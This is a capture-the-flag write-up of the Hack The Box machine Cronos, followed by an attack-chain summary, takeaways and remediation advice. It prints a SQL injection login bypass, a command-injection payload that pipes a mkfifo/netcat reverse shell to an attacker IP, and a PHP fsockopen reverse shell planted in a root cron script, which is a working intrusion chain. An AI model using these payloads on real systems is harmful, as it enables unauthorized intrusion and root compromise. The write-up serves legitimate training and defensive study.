Hacking Insights by Max Bautista

Cronos writeup

Box name: Cronos

Difficulty: Medium

OS: Linux

Overview: CronOS focuses mainly on different vectors for enumeration and also emphasises the risks associated with adding world-writable files to the root crontab. This machine also includes an introductory-level SQL injection vulnerability.

Link: https://app.hackthebox.com/machines/Cronos?sort_by=created_at&sort_type=desc

Machine IP: 10.129.227.211

Ran rustscan against the machine.

rustscan -a 10.129.227.211 –ulimit 5000 -b 2000 — -A -Pn

Navigated to the webserver and its a Default apache server.

Ran feroxbuster.

feroxbuster -u http://10.129.227.211 -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,html,txt,bak,zip,json,xml,py,sh,config –force-recursion -t 50 -d 4 –filter-status 404,400

Feroxbuster not finding anything right away. SSH is an older version and there is a CVE for that but I’ll try that last as I doubt that’s the path. Nothing interesting from port 53 DNS. Rerunning rustscan and also checking udp ports. I got stuck here and peeked at the write. I guess I wasn’t using nslookup properly to get a useful response.

nslookup 10.129.227.211 10.129.227.211

Added that to /etc/hosts. With this new information if we dig it we get another subdomain.

This brings us to a basic log in. Added admin.cronos.htb to /etc/hosts and navigated to it.

I was able to log in using SQL injection.

UserName: ‘ or 1=1 — –

Password: t

On successful log in it brings us to some Net Tool.

It successfully pings me using the ping option and my ip address. I piped id and that also worked.

Wanted to see if there is netcat on the device by piping which nc and that worked.

Let’s try to get a reverse shell. Set up a listener. Tried a few from revshells and I was able to get a shell.

8.8.8.8|rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.27 1337 >/tmp/f

Stabilized my shell.

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
# Ctrl + Z
stty raw -echo; fg
# hit space
export TERM=xterm

Poked around and it looks like the main site runs laravel and has a mysql database.

I couldn’t find any creds. Checked /home and there is another user that we can get user.txt from.

Did more local enumeration. Eventually I saw that there was a cronjob running a script as root.

We can edit this file.

Tried changing it to a bash revshell then realized it’s running php from the cronjob. Editing the file to:

<?php $sock=fsockopen(“10.10.16.27”,1338);exec(“sh <&3 >&3 2>&3”);

And we got a shell as root.

GG

Attack Chain

1 – Reconnaissance Ran RustScan and identified ports 22 (SSH), 53 (DNS), and 80 (HTTP). Browsed to port 80 and found a default Apache page. Ran feroxbuster with no useful results. Noted an older SSH version but deprioritized it. Used nslookup against the machine’s own DNS server to resolve the hostname and discovered cronos.htb. Added it to /etc/hosts and used dig to enumerate subdomains, finding admin.cronos.htb.

rustscan -a 10.129.227.211 –ulimit 5000 -b 2000 — -A -Pn nslookup 10.129.227.211 10.129.227.211 feroxbuster -u http://10.129.227.211 -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,html,txt,bak,zip,json,xml,py,sh,config –force-recursion

2 – SQL injection authentication bypass Navigated to admin.cronos.htb and found a login page. Bypassed authentication using a classic SQL injection payload and logged in without valid credentials. The admin panel exposed a Net Tool with ping and traceroute functionality.

Username: ‘ or 1=1 — –

3 – Initial Access – command injection in Net Tool Tested the ping functionality and confirmed it was passing input directly to a system command. Piped id and confirmed command injection. Confirmed netcat was present on the system. Used a mkfifo reverse shell payload to obtain an interactive shell as www-data.

8.8.8.8|rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.27 1337 >/tmp/f

4 – User flag Stabilized the shell and enumerated /home. Found another user with user.txt accessible. Retrieved user.txt.

5 – Privilege Escalation – writable root crontab script Enumerated running cron jobs and identified a PHP script being executed as root on a schedule. The script file was world-writable. Replaced the contents with a PHP reverse shell payload, set up a listener, and waited for the cron job to execute. Received a root shell. Retrieved root.txt.

<?php $sock=fsockopen(“10.10.16.27”,1338);exec(“sh <&3 >&3 2>&3”);

---

Key Takeaways

1. SQL injection authentication bypass on admin panel – CWE-89 – The admin login form passed user-supplied input directly into a SQL query without sanitization, allowing complete authentication bypass with a classic OR 1=1 payload. All database queries must use parameterized statements and admin panels must implement additional authentication controls beyond a single login form.
   
2. DNS zone transfer or subdomain enumeration revealing admin panel – The admin subdomain was only discoverable by querying the machine’s own DNS server, which returned zone data exposing internal hostnames. DNS servers must be configured to restrict zone transfers to authorized secondary servers only and internal subdomains must not be discoverable through unauthenticated DNS queries.
   
3. Command injection in Net Tool – CWE-78 – The ping and traceroute functionality passed user input directly to a system command with no sanitization, allowing arbitrary OS command execution via pipe characters. All input that interacts with system commands must be validated against a strict allowlist and commands must be executed using safe API calls rather than shell execution.
   
4. World-writable file executed by root cron job – A PHP script owned by or writable by a non-root user was scheduled to run as root via crontab. Any file executed by a privileged process must be owned by root and must not be writable by any other user. Root crontab entries must be audited regularly for world or group writable scripts.
   
5. Admin panel exposed on a discoverable subdomain with no additional protection – The admin panel was accessible directly from the network with no IP restriction, VPN requirement, or additional authentication layer. Administrative interfaces must be restricted to authorized management networks and must never be reachable from untrusted hosts.
   

---

Remediation

[Immediate] Remediate the SQL injection vulnerability – CWE-89 Rewrite all database queries in the admin panel and any other application using parameterized queries or prepared statements. Conduct a full code audit of the Laravel application for any additional SQL injection points. Deploy a WAF with SQL injection detection rules as a compensating control during remediation.

[Immediate] Remediate the command injection vulnerability – CWE-78 Rewrite the Net Tool functionality to use safe API calls with no shell execution. Validate all user-supplied input against a strict allowlist of permitted IP address formats. If ping and traceroute functionality is not operationally required, remove it entirely from the application.

[Immediate] Fix permissions on all root crontab scripts Audit all scripts referenced in root crontab entries and set them to be owned by root with mode 755 or stricter. Remove write access for all non-root users. Implement file integrity monitoring on all cron-executed scripts to alert on unauthorized modifications.

[Immediate] Restrict DNS zone transfers Configure the DNS server to allow zone transfers only to explicitly authorized secondary DNS servers. Disable recursive queries for external clients. Audit all DNS records for internal subdomains that should not be publicly discoverable and remove or restrict any that expose internal infrastructure.

[Short-term] Restrict access to the admin panel Apply firewall rules restricting access to admin.cronos.htb to specific authorized management IP addresses. Require VPN access for all administrative interfaces. Implement MFA on the admin login page and enforce account lockout after failed authentication attempts.

[Long-term] Implement a secure development lifecycle for web applications SQL injection and command injection are well-understood vulnerability classes that must be caught before deployment. Integrate SAST tooling into the CI/CD pipeline, conduct regular web application penetration tests, and train developers on secure coding practices covering parameterized queries, input validation, and safe system command execution.